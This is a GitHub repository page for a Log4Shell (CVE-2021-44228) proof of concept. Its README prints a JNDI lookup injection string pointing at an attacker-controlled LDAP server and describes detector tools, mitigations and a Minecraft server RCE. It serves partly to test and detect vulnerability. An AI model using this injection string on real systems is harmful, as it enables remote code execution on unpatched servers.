Skip to content

o7-Fire/Log4Shell

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
.idea
.idea
 
 
gradle/wrapper
gradle/wrapper
 
 
payload
payload
 
 
src/main/java/itzbenz
src/main/java/itzbenz
 
 
standalone-detector
standalone-detector
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
build.gradle
build.gradle
 
 
gradlew
gradlew
 
 
gradlew.bat
gradlew.bat
 
 
settings.gradle
settings.gradle
 
 

Repository files navigation

Log4Shell Zero-Day Exploit

if attacker manage to log this string ${jndi:ldap://someaddresshere/param1=value1} to log4j it somehow loads the class/java bytecode sent by Attacker Controlled LDAP Server. The bytecode could be used to execute any malicious code or do some little trolling.

take this with grain of salt, I'm not a security expert.

inb4:

Log4Shell.mp4

Detection

Patched

  • Mitigated by deleting org.apache.logging.log4j.core.lookup.JndiLookup somehow didn't crash

Unpatched

  • Note: 1.16.5 Minecraft Server RCE exploit

MainDetector.java

Use simple socket to listen on port 1389 then close the socket once its connected no external dependency

  • Note: not always the case, sometimes it doesn't bother to load class url location given by LDAP Server

  • Vulnerable to lookup:

  • Log:

going to throw error if its is vulnerable

MainAlerter.java

Use com.unboundid:unboundid-ldapsdk library to host LDAP server

  • Note: doesn't mean it's vulnerable to RCE exploit.
  • Vulnerable to lookup:
  • LADP Server logs:

DNS Log

Both sender and receiver are logged which mean they are vulnerable

  • Note: if it's get logged, doesn't mean it's vulnerable to RCE
  • Vulnerable to lookup:

Conclusion

  • if java do LDAP lookup doesn't mean it is always vulnerable, but if is load the classpath provided then it is ?

    • vulnerable to RCE and LDAP lookup:
    • not vulnerable because java don't fetch bytecode ??, still vulnerable to LDAP lookup:

  • to test if it's actually vulnerable to RCE, try to use harmless payloads if its running then its vulnerable.

  • if com.sun.jndi.ldap.object.trustURLCodebase property is set to true then you are vulnerable like really else, the attacker can use existing classpath

  • if you found the victim log and see this:

  Caused by: java.lang.ClassNotFoundException: itzbenz.payload.ObjectPayloadSerializable
        at java.net.URLClassLoader.findClass(Unknown Source)
        at java.lang.ClassLoader.loadClass(Unknown Source)
        at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source)
        at java.lang.ClassLoader.loadClass(Unknown Source)

it's safe because it will not load classpath provided by attacker ?? though it's still doing LDAP lookup which is large attack surface.

note: (after updating java 8, the minecraft server seem not load the classpath)

Disclaimer

This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.

About

Log4Shell Zero-Day Exploit Proof of Concept

Topics

ldap log4j rce zero-day cve-2021-44228 log4shell

Resources

Readme
Activity
Custom properties

Stars

23 stars

Watchers

1 watching

Forks

11 forks
Report repository

Releases

No releases published

Packages

 
 
 

Languages